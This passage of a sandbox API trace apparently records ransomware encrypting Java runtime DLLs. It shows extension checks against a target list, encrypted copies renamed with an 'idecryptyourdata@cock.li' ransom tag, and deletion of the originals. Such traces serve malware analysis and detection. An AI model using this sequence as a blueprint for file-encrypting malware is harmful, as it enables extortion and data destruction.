Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString=".jpg") returned 4 [0199.477] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.477] lstrlenW (lpString=".doc") returned 4 [0199.477] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0199.477] lstrlenW (lpString=".docx") returned 5 [0199.477] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0199.477] lstrlenW (lpString=".pdf") returned 4 [0199.477] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString=".xls") returned 4 [0199.477] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0199.477] lstrlenW (lpString=".xlsx") returned 5 [0199.477] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0199.477] lstrlenW (lpString=".ppt") returned 4 [0199.478] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0199.478] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.478] lstrlenW (lpString=".zip") returned 4 [0199.478] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0199.478] lstrlenW (lpString=".rar") returned 4 [0199.478] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0199.478] lstrlenW (lpString=".bz2") returned 4 [0199.478] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0199.478] lstrlenW (lpString=".7z") returned 3 [0199.478] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0199.478] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.478] lstrlenW (lpString=".dbf") returned 4 [0199.478] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0199.478] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.478] lstrlenW (lpString=".1cd") returned 4 [0199.478] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0199.478] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ssvagent.exe") returned 51 [0199.478] lstrlenW (lpString=".jpg") returned 4 [0199.478] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0199.478] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0199.478] lstrlenW (lpString="sunec.dll") returned 9 [0199.478] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0199.479] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=135744) returned 1 [0199.479] CloseHandle (hObject=0x344) returned 1 [0199.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll")) returned 0x20 [0199.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0199.479] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0199.479] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.479] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.479] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0199.480] GetLastError () returned 0x0 [0199.480] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x21240, lpOverlapped=0x0) returned 1 [0200.073] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x21250, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x21250, lpOverlapped=0x0) returned 1 [0200.076] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.076] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe6, lpOverlapped=0x0) returned 1 [0200.076] SetEndOfFile (hFile=0x330) returned 1 [0200.472] CloseHandle (hObject=0x330) returned 1 [0200.472] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.472] SetEndOfFile (hFile=0x344) returned 1 [0200.474] CloseHandle (hObject=0x344) returned 1 [0200.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.474] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\sunec.dll")) returned 1 [0200.474] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.474] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.474] lstrlenW (lpString=".doc") returned 4 [0200.474] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString=".docx") returned 5 [0200.475] lstrcmpiW (lpString1=".docx", lpString2="c.dll") returned -1 [0200.475] lstrlenW (lpString=".pdf") returned 4 [0200.475] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString=".xls") returned 4 [0200.475] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString=".xlsx") returned 5 [0200.475] lstrcmpiW (lpString1=".xlsx", lpString2="c.dll") returned -1 [0200.475] lstrlenW (lpString=".ppt") returned 4 [0200.475] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.475] lstrlenW (lpString=".zip") returned 4 [0200.475] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString=".rar") returned 4 [0200.475] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.475] lstrlenW (lpString=".bz2") returned 4 [0200.475] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.475] lstrlenW (lpString=".7z") returned 3 [0200.475] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.475] lstrlenW (lpString=".dbf") returned 4 [0200.475] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.475] lstrlenW (lpString=".1cd") returned 4 [0200.475] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.475] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.475] lstrlenW (lpString=".jpg") returned 4 [0200.475] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.476] lstrlenW (lpString=".doc") returned 4 [0200.476] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString=".docx") returned 5 [0200.476] lstrcmpiW (lpString1=".docx", lpString2="c.dll") returned -1 [0200.476] lstrlenW (lpString=".pdf") returned 4 [0200.476] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString=".xls") returned 4 [0200.476] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString=".xlsx") returned 5 [0200.476] lstrcmpiW (lpString1=".xlsx", lpString2="c.dll") returned -1 [0200.476] lstrlenW (lpString=".ppt") returned 4 [0200.476] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.476] lstrlenW (lpString=".zip") returned 4 [0200.476] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString=".rar") returned 4 [0200.476] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.476] lstrlenW (lpString=".bz2") returned 4 [0200.476] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.476] lstrlenW (lpString=".7z") returned 3 [0200.476] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.476] lstrlenW (lpString=".dbf") returned 4 [0200.476] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.476] lstrlenW (lpString=".1cd") returned 4 [0200.476] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.476] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\sunec.dll") returned 48 [0200.477] lstrlenW (lpString=".jpg") returned 4 [0200.477] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.477] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.477] lstrlenW (lpString="verify.dll") returned 10 [0200.477] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0200.478] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=49216) returned 1 [0200.478] CloseHandle (hObject=0x344) returned 1 [0200.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll")) returned 0x20 [0200.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.478] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0200.478] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.478] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.478] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0200.479] GetLastError () returned 0x0 [0200.479] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xc040, lpOverlapped=0x0) returned 1 [0200.604] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xc050, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xc050, lpOverlapped=0x0) returned 1 [0200.605] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.605] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe8, lpOverlapped=0x0) returned 1 [0200.605] SetEndOfFile (hFile=0x330) returned 1 [0200.606] CloseHandle (hObject=0x330) returned 1 [0200.606] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.606] SetEndOfFile (hFile=0x344) returned 1 [0200.607] CloseHandle (hObject=0x344) returned 1 [0200.607] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0200.607] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll")) returned 1 [0200.607] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.607] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.607] lstrlenW (lpString=".doc") returned 4 [0200.607] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.607] lstrlenW (lpString=".docx") returned 5 [0200.607] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0200.607] lstrlenW (lpString=".pdf") returned 4 [0200.607] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.607] lstrlenW (lpString=".xls") returned 4 [0200.607] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.607] lstrlenW (lpString=".xlsx") returned 5 [0200.607] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0200.607] lstrlenW (lpString=".ppt") returned 4 [0200.608] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString=".zip") returned 4 [0200.608] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString=".rar") returned 4 [0200.608] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString=".bz2") returned 4 [0200.608] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.608] lstrlenW (lpString=".7z") returned 3 [0200.608] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString=".dbf") returned 4 [0200.608] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString=".1cd") returned 4 [0200.608] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString=".jpg") returned 4 [0200.608] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.608] lstrlenW (lpString=".doc") returned 4 [0200.608] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString=".docx") returned 5 [0200.608] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0200.608] lstrlenW (lpString=".pdf") returned 4 [0200.608] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString=".xls") returned 4 [0200.608] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0200.608] lstrlenW (lpString=".xlsx") returned 5 [0200.608] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0200.608] lstrlenW (lpString=".ppt") returned 4 [0200.608] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0200.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.609] lstrlenW (lpString=".zip") returned 4 [0200.609] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0200.609] lstrlenW (lpString=".rar") returned 4 [0200.609] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0200.609] lstrlenW (lpString=".bz2") returned 4 [0200.609] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0200.609] lstrlenW (lpString=".7z") returned 3 [0200.609] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0200.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.609] lstrlenW (lpString=".dbf") returned 4 [0200.609] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0200.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.609] lstrlenW (lpString=".1cd") returned 4 [0200.609] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0200.609] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll") returned 49 [0200.609] lstrlenW (lpString=".jpg") returned 4 [0200.609] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0200.609] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0200.609] lstrlenW (lpString="WindowsAccessBridge-64.dll") returned 26 [0200.609] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0200.610] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=110144) returned 1 [0200.610] CloseHandle (hObject=0x344) returned 1 [0200.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll")) returned 0x20 [0200.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0200.610] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0200.610] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.610] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.610] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0200.611] GetLastError () returned 0x0 [0200.611] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x1ae40, lpOverlapped=0x0) returned 1 [0201.664] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x1ae50, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x1ae50, lpOverlapped=0x0) returned 1 [0201.666] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.666] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x108, lpOverlapped=0x0) returned 1 [0201.666] SetEndOfFile (hFile=0x330) returned 1 [0201.667] CloseHandle (hObject=0x330) returned 1 [0201.667] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.667] SetEndOfFile (hFile=0x344) returned 1 [0201.668] CloseHandle (hObject=0x344) returned 1 [0201.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.669] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll")) returned 1 [0201.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.669] lstrlenW (lpString=".doc") returned 4 [0201.669] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString=".docx") returned 5 [0201.669] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0201.669] lstrlenW (lpString=".pdf") returned 4 [0201.669] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString=".xls") returned 4 [0201.669] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString=".xlsx") returned 5 [0201.669] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0201.669] lstrlenW (lpString=".ppt") returned 4 [0201.669] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.669] lstrlenW (lpString=".zip") returned 4 [0201.669] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString=".rar") returned 4 [0201.669] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.669] lstrlenW (lpString=".bz2") returned 4 [0201.669] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.669] lstrlenW (lpString=".7z") returned 3 [0201.670] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString=".dbf") returned 4 [0201.670] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString=".1cd") returned 4 [0201.670] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString=".jpg") returned 4 [0201.670] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString=".doc") returned 4 [0201.670] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString=".docx") returned 5 [0201.670] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0201.670] lstrlenW (lpString=".pdf") returned 4 [0201.670] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString=".xls") returned 4 [0201.670] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString=".xlsx") returned 5 [0201.670] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0201.670] lstrlenW (lpString=".ppt") returned 4 [0201.670] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.670] lstrlenW (lpString=".zip") returned 4 [0201.670] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0201.670] lstrlenW (lpString=".rar") returned 4 [0201.670] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0201.671] lstrlenW (lpString=".bz2") returned 4 [0201.671] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0201.671] lstrlenW (lpString=".7z") returned 3 [0201.671] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0201.671] lstrlenW (lpString="C:\\Program 